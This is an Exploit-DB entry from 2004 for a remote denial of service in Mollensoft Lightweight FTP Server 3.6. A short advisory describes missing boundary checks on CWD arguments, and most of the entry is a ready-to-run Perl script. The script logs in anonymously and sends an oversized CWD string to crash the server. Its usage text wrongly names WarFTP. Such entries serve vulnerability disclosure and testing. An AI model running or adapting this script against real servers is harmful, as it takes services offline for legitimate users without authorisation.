Mollensoft Lightweight FTP Server 3.6 - Remote Denial of Service

EDB-ID:

24142


Author:

storm

Type:

dos


Platform:

Windows

Date:

2004-05-24


source: https://www.securityfocus.com/bid/10409/info

A denial of service condition is reported to exist in the MollenSoft Lightweight FTP Server that may allow a remote user to deny service to legitimate FTP users. The vulnerability is due to a lack of sufficient boundary checks performed on CWD command arguments.

It should be noted that although this vulnerability is reported to affect Mollensoft Lightweight FTP Server version 3.6 other versions might also be affected. 

#!/usr/bin/perl
#
# Mollensoft FTP Server CMD Buffer Overflow
#
# Orkut users? Come join the SecuriTeam community
# http://www.orkut.com/Community.aspx?cmm=44441

use strict;
use IO::Socket::INET;

usage() unless (@ARGV == 2);

my $host = shift(@ARGV);
my $port = shift(@ARGV);

# create the socket
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host,
PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

$socket->autoflush(1);

# receive greeting
my $repcode = "220 ";
my $response = recv_reply($socket, $repcode);
print $response;

# send USER command
#my $username = "%00" x 2041;
my $username = "anonymous";
print "USER $username\r\n";
print $socket "USER $username\r\n";

select(undef, undef, undef, 0.002); # sleep of 2 milliseconds

# send PASS command
my $password = "a\@b.com";
print "PASS $password\r\n";
print $socket "PASS $password\r\n";

my $cmd = "CWD ";
$cmd .= "A" x 224; # Value can range from 224 to 1018
$cmd .= "\r\n";
print "length: ".length($cmd)."\n";
print $socket $cmd;

$repcode = "";
recv_reply($socket, $repcode);

close($socket);
exit(0);

sub usage
{
 # print usage information
 print "\nUsage:  Mollensoft_FTP_Server_crash.pl <host> <port>\n
<host> - The host to connect to
<port> - The TCP port which WarFTP is listening on\n\n";
 exit(1);
}

sub recv_reply
{
 # retrieve any reply
 my $socket = shift;
 my $repcode = shift;
 $socket or die "Can't receive on socket\n";

 my $res="";
 while(<$socket>)
 {
  $res .= $_;
  if (/$repcode/) { last; }
 }
 return $res;
}